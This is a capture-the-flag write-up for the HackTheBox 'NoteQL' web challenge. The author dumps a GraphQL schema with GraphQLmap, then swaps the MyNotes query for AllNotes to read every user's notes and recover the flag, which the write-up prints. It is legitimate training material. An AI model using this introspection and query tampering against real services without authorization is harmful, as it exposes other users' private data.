Challenge Info

I don't think that replacing your REST APIs means that you don't need access controls. Can you read the admin's tasks from this minimal note taking application?

Solution

The title of this challenge pretty much tells us straight away that we're dealing with GraphQL.

Visiting the website:

I used a tool called GraphQLmap to get a better understanding of the GraphQL we're dealing with.

┌─[s1gh@fsociety]─[~/Documents/HackTheBox/HTB-Business-CTF-2021/Web/NoteQL/GraphQLmap]
└──╼ $ python3 graphqlmap.py -u http://165.227.225.92:32634/graphql
   _____                 _      ____  _                            
  / ____|               | |    / __ \| |                           
 | |  __ _ __ __ _ _ __ | |__ | |  | | |     _ __ ___   __ _ _ __  
 | | |_ | '__/ _` | '_ \| '_ \| |  | | |    | '_ ` _ \ / _` | '_ \ 
 | |__| | | | (_| | |_) | | | | |__| | |____| | | | | | (_| | |_) |
  \_____|_|  \__,_| .__/|_| |_|\___\_\______|_| |_| |_|\__,_| .__/ 
                  | |                                       | |    
                  |_|                                       |_|    
                              Author: @pentest_swissky Version: 1.0 
GraphQLmap > dump_new
============= [SCHEMA] ===============
e.g: name[Type]: arg (Type!)

Query
        AllNotes[Post]: 
        Note[]: id (ID!), 
        MyNotes[Post]: 
        NotesFrom[Post]: author (String!), 
Post
        id[]: 
        title[]: 
        author[]: 
        completed[]: 
Mutation
        createNote[]: title (String!), 
        updateNote[]: id (ID!), title (String!), author (String!), 
        completeNote[]: id (ID!), 
        deleteNote[]: id (ID!), 
__Schema
__Type
__Field
__InputValue
__EnumValue
__Directive
GraphQLmap >

We see a query called AllNotes - which is quite interesting.

After adding a note and clicking on the recently added note (and sending the request through Burp):

I change MyNotes to AllNotes in order the dump every note that's stored in this application.

And here we find the flag!

Flag: HTB{n0b0dy_c0ntr0ls_m3!!}